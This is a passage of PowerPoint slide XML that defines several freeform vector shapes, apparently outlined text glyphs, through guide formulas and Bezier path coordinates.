                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="196"/>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39" name="Freeform 880">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD30ABF-2034-4C47-A4FA-F6744361E770}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId56"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4992688" y="1984376"/>
              <a:ext cx="28575" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17" fmla="*/ 6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32">
                  <a:moveTo>
                    <a:pt x="51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="103"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="7" y="132"/>
                    <a:pt x="16" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="132"/>
                    <a:pt x="83" y="105"/>
                    <a:pt x="83" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="24" y="63"/>
                    <a:pt x="41" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="63"/>
                    <a:pt x="47" y="62"/>
                    <a:pt x="51" y="6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40" name="Freeform 881">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51C71F6-A934-4BFA-852D-39F2C73B47D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId57"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3005138" y="2108201"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 135"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 45 w 135"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="45" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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41" name="Rectangle 882">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34555248-8A76-47E2-A334-3C551E6AA8C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId58"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3073401" y="2236788"/>
              <a:ext cx="180975" cy="7938"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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42" name="Freeform 883">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE6A0B3-E731-4871-942A-263D44FF21E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId59"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3263901" y="2139951"/>
              <a:ext cx="69850" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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43" name="Freeform 884">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48FAF8E-489E-48EE-9EE6-01CB0E8A2092}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId60"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3354388" y="2109788"/>
              <a:ext cx="71438" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 20 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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44" name="Freeform 885">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7898AE11-6520-4841-8DDF-5347AB20E387}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId61"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3440113" y="2138363"/>
              <a:ext cx="82550" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="32"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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45" name="Freeform 886">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58DB3EA9-6D29-438C-B5F1-082DEF264453}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId62"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3530601" y="2138363"/>
              <a:ext cx="82550" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 240"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
